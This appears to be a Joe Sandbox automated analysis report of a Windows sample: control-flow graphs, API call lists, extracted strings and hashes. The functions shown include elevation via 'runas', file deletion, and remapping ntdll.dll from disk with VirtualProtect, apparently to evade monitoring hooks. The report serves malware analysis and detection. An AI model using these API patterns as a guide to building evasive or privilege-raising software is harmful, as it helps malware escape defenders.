                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000001), ref: 00402683
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$BringCloseExecuteHandleObjectShellShowSingleWait
                                                                                                                                                                      • String ID: <$runas
                                                                                                                                                                      • API String ID: 2226624165-1187129395
                                                                                                                                                                      • Opcode ID: dbdcd702e5a1619ba63cf14ee2d9bd67ed3a3f23e0009610b057d5023b2708c2
                                                                                                                                                                      • Instruction ID: 65311103378905c9ebe784321d88e0c12e821115cb0bb151a8b9c460e2bc92c5
                                                                                                                                                                      • Opcode Fuzzy Hash: dbdcd702e5a1619ba63cf14ee2d9bd67ed3a3f23e0009610b057d5023b2708c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C315A71E00209ABDF10AFD4EC45ADEBBB8EF04314F10413AEA05A62E0DB795945CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 913 402d53-402d60 914 402d62-402d67 913->914 915 402d6c-402d77 913->915 916 403054-403055 914->916 917 402d80-402d8f 915->917 918 402d79-402d7b 915->918 920 402d91-402d97 917->920 921 402d99-402dba 917->921 919 403053 918->919 919->916 920->921 924 402dc0-402dcc call 41158b 921->924 925 403047-403052 call 411fdb 921->925 930 402dd2-402dd7 924->930 931 403034-40303c 924->931 925->919 930->931 932 402ddd-402e2d call 4116bd call 411748 call 4116bd call 419a19 930->932 935 40303e-403046 call 419a19 931->935 946 402e33-402e37 932->946 947 40302a-403032 call 411fdb 932->947 935->925 949 402e39-402e3c 946->949 950 402e3e-402e43 946->950 947->935 952 402e58-402e6e 949->952 953 402e52-402e55 950->953 954 402e45 950->954 952->947 957 402e74-402e94 952->957 953->952 955 402e47-402e4d 954->955 959 403028 955->959 957->947 961 402e9a-402ea0 957->961 959->947 962 402ea2-402ea5 961->962 963 402ebb-402ecd GetLocalTime SystemTimeToFileTime 961->963 964 402ea7-402ea9 962->964 965 402eab-402eb9 962->965 966 402ed3-402ed7 963->966 964->955 965->966 967 402ef1-402eff call 404399 966->967 968 402ed9-402ee4 call 403769 966->968 973 402f05-402f08 967->973 974 403019-403024 GetLastError 967->974 975 403015-403017 968->975 976 402eea-402eec 968->976 973->975 977 402f0e-402f1a call 4199d2 973->977 974->959 975->947 976->955 980 402f2c 977->980 981 402f1c-402f2a 977->981 982 402f2e-402f37 980->982 981->982 983 402f42-402f53 call 410219 982->983 984 402f39-402f3f 982->984 987 402f58-402f5a 983->987 984->983 988 402f60-402f83 GetLastError call 411523 call 4040ff 987->988 989 402ff7-403007 call 4012c5 987->989 998 402f92-402fa9 call 403769 988->998 999 402f85-402f90 988->999 995 403009-40300b 989->995 995->947 997 40300d-403013 995->997 997->947 1005 402fb5-402fd0 call 410219 998->1005 1006 402fab-402fb3 998->1006 1004 402fe1-402fec call 419a19 999->1004 1004->995 1012 402fd2-402fdd GetLastError 1005->1012 1013 402fee-402ff6 call 419a19 1005->1013 1006->1004 1012->1004 1013->989
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 335121be1f8f7a6b615148e639b69205c1f91d20e84652666468dd977a09481f
                                                                                                                                                                      • Instruction ID: 35b07dd9172f5d72442aa58c96c23412c93c3bcfe8ab725f254cd64513162106
                                                                                                                                                                      • Opcode Fuzzy Hash: 335121be1f8f7a6b615148e639b69205c1f91d20e84652666468dd977a09481f
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BA1BFB1900205AFCF14DFA4D888AAA7BB8BF48315F10416AF901FB2D1DB79DD82CB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1182 404399-4043b5 FindFirstFileW 1183 4043b7-4043ba 1182->1183 1184 4043bb-4043c9 FindClose 1182->1184 1185 4043d8-4043df 1184->1185 1186 4043cb-4043d7 SetLastError 1184->1186 1187 4043e1-4043eb call 403e46 1185->1187 1188 4043ec-4043ef 1185->1188 1190 4043f1-404403 CompareFileTime 1188->1190 1191 404405-404409 1188->1191 1190->1187 1190->1191
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 004043AC
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004043BC
                                                                                                                                                                      • SetLastError.KERNEL32(00000010), ref: 004043CD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseErrorFileFirstLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4020440971-0
                                                                                                                                                                      • Opcode ID: feb52326722ee985cfa4a5e4ac0c4cc83b7ff906a8a099fb5d062e4b931a5238
                                                                                                                                                                      • Instruction ID: b43c34f3000c6b0c36565e86e6f292a36c88a4808e8d08daf7d66170f4e25050
                                                                                                                                                                      • Opcode Fuzzy Hash: feb52326722ee985cfa4a5e4ac0c4cc83b7ff906a8a099fb5d062e4b931a5238
                                                                                                                                                                      • Instruction Fuzzy Hash: 9AF09670700108ABDF21AF71EC4DB5B3BACAB4035EF1047B1F925E11E0E774DA46AA58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1193 403da4-403db4 1194 403e04-403e08 1193->1194 1195 403db6-403dc9 FindFirstFileW 1193->1195 1195->1194 1196 403dcb-403dd9 FindClose 1195->1196 1197 403df9-403dfc call 403c8f 1196->1197 1198 403ddb-403de8 SetFileAttributesW 1196->1198 1202 403e01-403e03 1197->1202 1199 403df5-403df8 1198->1199 1200 403dea-403df4 DeleteFileW 1198->1200
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(0040638E,?), ref: 00403DC0
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00403DCC
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(0040638E,00000000), ref: 00403DE0
                                                                                                                                                                      • DeleteFileW.KERNEL32(0040638E), ref: 00403DED
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Find$AttributesCloseDeleteFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3319113142-0
                                                                                                                                                                      • Opcode ID: 7a61a38b35f2b05a7b4bde6f25ad9c61d42a494951ae97ad8595f31ef7f661e8
                                                                                                                                                                      • Instruction ID: 10cdb507c6f18802a829504191793466465721f7b53cb2a47095233dfdd97b6e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a61a38b35f2b05a7b4bde6f25ad9c61d42a494951ae97ad8595f31ef7f661e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF05431600148ABDF219F30ED4D75A3FA9AB4035BF444675F41AE00F0DB78CE86AA88
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1212 40adb0-40ae07 call 40d625 1215 40ae13-40ae48 call 40a578 call 40acbf call 40f4b1 1212->1215 1216 40ae09-40ae0e 1212->1216 1226 40b2eb-40b2f0 1215->1226 1227 40ae4e-40ae63 1215->1227 1217 40b536-40b544 call 40a7f8 1216->1217 1230 40b522-40b531 call 419a19 call 40a73b 1226->1230 1228 40aeb0-40aeb2 1227->1228 1229 40ae65-40ae82 1227->1229 1231 40aeb4-40aec8 call 40ab24 1228->1231 1232 40aece-40aed5 1228->1232 1233 40ae94 1229->1233 1234 40ae84 1229->1234 1230->1217 1231->1232 1248 40afd3-40aff4 1231->1248 1237 40aee3 1232->1237 1238 40aed7-40aee1 1232->1238 1241 40ae96 1233->1241 1239 40ae86-40ae88 1234->1239 1240 40ae8a-40ae8f 1234->1240 1245 40aee5-40aef2 call 4199d2 1237->1245 1238->1245 1239->1240 1239->1241 1240->1230 1246 40ae98-40ae9b 1241->1246 1247 40aea9-40aead 1241->1247 1253 40aef4-40aefc call 40a660 1245->1253 1254 40aefe-40af27 call 4012c5 1245->1254 1246->1247 1251 40ae9d-40aea7 1246->1251 1247->1228 1257 40b273-40b277 1248->1257 1258 40affa-40b004 1248->1258 1251->1228 1253->1254 1254->1230 1271 40af2d-40af33 1254->1271 1261 40b284-40b2a3 call 4199d2 1257->1261 1262 40b279-40b27f 1257->1262 1264 40b007-40b01a 1258->1264 1272 40b2f5-40b2f9 1261->1272 1273 40b2a5-40b2b3 call 40a609 1261->1273 1262->1261 1269 40b01c 1264->1269 1270 40b01f-40b035 1264->1270 1269->1270 1286 40b070-40b086 1270->1286 1287 40b037-40b048 call 4144c5 1270->1287 1274 40afb2-40afd0 call 40a98e call 40a927 1271->1274 1275 40af35 1271->1275 1276 40b2fc-40b2fe 1272->1276 1273->1276 1274->1248 1279 40af37-40af4f call 4100ac 1275->1279 1281 40b300-40b302 1276->1281 1282 40b306-40b30c 1276->1282 1291 40af54-40af5b 1279->1291 1281->1282 1284 40b34a 1282->1284 1285 40b30e-40b333 1282->1285 1290 40b34d-40b356 1284->1290 1301 40b510-40b512 1285->1301 1302 40b339-40b348 call 4012c5 1285->1302 1311 40b140-40b156 1286->1311 1312 40b08c-40b097 1286->1312 1296 40b04b-40b060 1287->1296 1294 40b465 1290->1294 1295 40b35c-40b37e 1290->1295 1297 40af73-40af7b call 40a7da 1291->1297 1298 40af5d-40af67 1291->1298 1309 40b468-40b476 call 40a51c 1294->1309 1303 40b380-40b387 call 4106d5 1295->1303 1304 40b3a1-40b3af call 4199d2 1295->1304 1305 40b066-40b068 1296->1305 1306 40b2c8-40b2ca 1296->1306 1297->1230 1307 40af80-40af84 1298->1307 1308 40af69-40af6c 1298->1308 1318 40b514-40b516 1301->1318 1319 40b51a-40b51d call 40a6a1 1301->1319 1302->1290 1328 40b38a-40b38e 1303->1328 1332 40b3b1-40b3bd 1304->1332 1333 40b3bf 1304->1333 1305->1286 1320 40b06a-40b06c 1305->1320 1306->1230 1316 40b2d0-40b2d6 1306->1316 1322 40af6e 1307->1322 1325 40af86-40af89 1307->1325 1321 40af8b-40afac call 40a7da 1308->1321 1308->1322 1340 40b478-40b47a 1309->1340 1341 40b48b-40b48f 1309->1341 1337 40b178-40b19e call 40a54a call 40a51c 1311->1337 1338 40b158-40b168 1311->1338 1314 40b2c3 1312->1314 1315 40b09d-40b0ae 1312->1315 1314->1306 1348 40b0b4-40b0cc 1315->1348 1349 40b2b5-40b2c1 SysFreeString 1315->1349 1316->1230 1318->1319 1319->1230 1320->1286 1321->1274 1367 40afae-40afb0 1321->1367 1322->1297 1325->1321 1325->1322 1328->1301 1339 40b394-40b39f call 4012c5 1328->1339 1347 40b3c1-40b3d3 call 4012c5 call 40b595 1332->1347 1333->1347 1380 40b1a0-40b1a6 1337->1380 1381 40b21e-40b226 1337->1381 1338->1306 1362 40b16e-40b170 1338->1362 1364 40b3d8-40b3e4 call 4199d2 1339->1364 1344 40b47c-40b489 1340->1344 1345 40b501 1341->1345 1346 40b491-40b49b 1341->1346 1344->1341 1344->1344 1356 40b506-40b50f call 419a19 1345->1356 1351 40b4d4-40b4ed call 40f78d 1346->1351 1352 40b49d-40b4ad call 40fbda 1346->1352 1347->1364 1353 40b0dc-40b0f2 call 419a10 1348->1353 1354 40b0ce-40b0d9 call 4116bd 1348->1354 1349->1306 1371 40b4f0-40b4f7 1351->1371 1352->1351 1382 40b4af-40b4b9 call 4199d2 1352->1382 1384 40b0f4-40b108 1353->1384 1385 40b10a-40b124 call 419a19 1353->1385 1354->1353 1356->1301 1362->1337 1378 40b172-40b174 1362->1378 1388 40b3f4 1364->1388 1389 40b3e6-40b3f2 1364->1389 1367->1279 1371->1356 1379 40b4f9-40b4ff 1371->1379 1378->1337 1379->1356 1386 40b1a9-40b1b6 call 40b547 1380->1386 1390 40b234-40b23a 1381->1390 1391 40b228-40b22e 1381->1391 1400 40b4c5-40b4d1 call 4012c5 1382->1400 1401 40b4bb-40b4c3 call 40a5c0 1382->1401 1384->1384 1384->1385 1385->1349 1412 40b12a-40b138 SysFreeString 1385->1412 1405 40b1d3-40b1e3 call 40b56e 1386->1405 1406 40b1b8-40b1d1 1386->1406 1395 40b3f6-40b43d call 40aaed call 4012c5 * 2 1388->1395 1389->1395 1398 40b23d-40b26d call 419a19 * 2 1390->1398 1391->1390 1396 40b230-40b232 1391->1396 1429 40b44a-40b453 1395->1429 1430 40b43f-40b448 1395->1430 1396->1398 1398->1257 1398->1264 1400->1351 1401->1400 1424 40b1e9-40b208 1405->1424 1425 40b2db-40b2ea call 419a19 * 2 1405->1425 1414 40b20b-40b21c 1406->1414 1412->1311 1419 40b13a-40b13c 1412->1419 1414->1381 1414->1386 1419->1311 1424->1414 1425->1226 1432 40b455-40b458 1429->1432 1433 40b45d-40b463 1429->1433 1430->1429 1432->1295 1433->1309
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                      • Opcode ID: 514e3e9620a8ae5786985dc9d2d01534f56d213f92649192631bf8da6f7093d0
                                                                                                                                                                      • Instruction ID: 425604c9566947a6de6f0846240264560f73a3d450305e8ffa0f2dd6e66e3d9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 514e3e9620a8ae5786985dc9d2d01534f56d213f92649192631bf8da6f7093d0
                                                                                                                                                                      • Instruction Fuzzy Hash: B5526075A00219DFCB14DFA9C8949AEBBB5FF48304B1440AEE805AB391DB34ED51CF99
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000002,?,0041BE95,00000003,0041BAE9,00000002,00000003,00000002,00000000), ref: 0041BEB8
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0041BE95,00000003,0041BAE9,00000002,00000003,00000002,00000000), ref: 0041BEBF
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0041BED1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 0ec046c3c7fc3c5c6e3fa67908c22cfa085986a804e92359d6edde0e14729fcb
                                                                                                                                                                      • Instruction ID: e0727390605d046cfdb7438c7375c554961c0a911bb9d4a230f12d223bae1d51
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ec046c3c7fc3c5c6e3fa67908c22cfa085986a804e92359d6edde0e14729fcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 17E0B631100258ABCF226F55DC09A9A3B69FF45342F454829F9058A232CB79EDD2CA98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004032D1
                                                                                                                                                                      • SendMessageW.USER32(00008001,00000000,?), ref: 0040332A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DiskFreeMessageSendSpace
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 696007252-0
                                                                                                                                                                      • Opcode ID: 3f6a5093db6dc284da08a1b9f75d34da9ee5183036e1cf9ed500a92b5cf20e08
                                                                                                                                                                      • Instruction ID: 11b616b47ea7f668fef1b3adcbda94cf74b945cdd4617e4d8853dd6224b3e8b1
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6a5093db6dc284da08a1b9f75d34da9ee5183036e1cf9ed500a92b5cf20e08
                                                                                                                                                                      • Instruction Fuzzy Hash: DE016270350205ABE714DF51EC96F5A3BADE701715F108536F900E91E1DBB9EE408B5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040656C
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0040657A
                                                                                                                                                                      • CreateFileA.KERNELBASE(c:\windows\system32\ntdll.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406595
                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000), ref: 004065A8
                                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 004065B7
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00406607
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0040663B
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00406651
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406656
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040665B
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040665E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFileHandle$CreateProtectVirtual$ChangeCurrentFindFreeLibraryMappingModuleNotificationProcessView
                                                                                                                                                                      • String ID: .text$c:\windows\system32\ntdll.dll$ntdll.dll
                                                                                                                                                                      • API String ID: 2881512047-673882835
                                                                                                                                                                      • Opcode ID: d5c6d6cd2f66e1340ec2a64d19c3e10e07b56e9b827ca4afbbf43d43cea2b974
                                                                                                                                                                      • Instruction ID: 0258a6196701b5f4aab08b61cb9c02687429d49db0ce2663443c7dc4406cac1e
                                                                                                                                                                      • Opcode Fuzzy Hash: d5c6d6cd2f66e1340ec2a64d19c3e10e07b56e9b827ca4afbbf43d43cea2b974
                                                                                                                                                                      • Instruction Fuzzy Hash: 82318D71A00214BFCB209FA5DC4EEAFBFB8EF48711F41446AF505E7252D634A951CB68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 602 406390-40641d LoadLibraryA #17 call 40a481 call 40478c call 4041e0 * 7 621 406423-406435 SHGetSpecialFolderPathW 602->621 622 406484-406488 621->622 623 406437-406454 wsprintfW call 40575f 621->623 622->621 624 40648a-40648e 622->624 626 406459-40645c 623->626 627 40645e-406464 626->627 628 406466-406479 call 40575f 627->628 629 40647c-406482 627->629 628->629 629->622 629->627
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32), ref: 004063A1
                                                                                                                                                                      • #17.COMCTL32 ref: 004063AC
                                                                                                                                                                        • Part of subcall function 0040478C: GetUserDefaultUILanguage.KERNEL32(004042F4), ref: 00404798
                                                                                                                                                                        • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404227
                                                                                                                                                                        • Part of subcall function 004041E0: wsprintfW.USER32 ref: 00404238
                                                                                                                                                                        • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                                                                                                                                        • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404252
                                                                                                                                                                        • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                                                                                                                                        • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404287
                                                                                                                                                                        • Part of subcall function 004041E0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                                                                                                                                        • Part of subcall function 004041E0: SetLastError.KERNEL32(00401877), ref: 004042CD
                                                                                                                                                                        • Part of subcall function 004041E0: lstrlenA.KERNEL32(00426DC8), ref: 00404303
                                                                                                                                                                        • Part of subcall function 004041E0: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00404352
                                                                                                                                                                        • Part of subcall function 004041E0: MultiByteToWideChar.KERNEL32(000004E4,00000000,00426DC8,00000001,00000000,00000002), ref: 00404388
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0040642D
                                                                                                                                                                      • wsprintfW.USER32 ref: 00406441
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWidelstrcmpilstrlen
                                                                                                                                                                      • String ID: lb$@ub$SfxFolder%02d$kernel32
                                                                                                                                                                      • API String ID: 4084782872-1389684564
                                                                                                                                                                      • Opcode ID: 38caa4c13e3165a2bea396bc0216dc50dcdee7f818541decef655bdf4143e517
                                                                                                                                                                      • Instruction ID: 38291be210b7a11e6caab71854138096774443545b7e4318438b9ed6e03a9197
                                                                                                                                                                      • Opcode Fuzzy Hash: 38caa4c13e3165a2bea396bc0216dc50dcdee7f818541decef655bdf4143e517
                                                                                                                                                                      • Instruction Fuzzy Hash: 7421B5F6E003146BD710AFB2AC4BB4A7A68EB54704F01163FF505AB191DAB94650CB5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
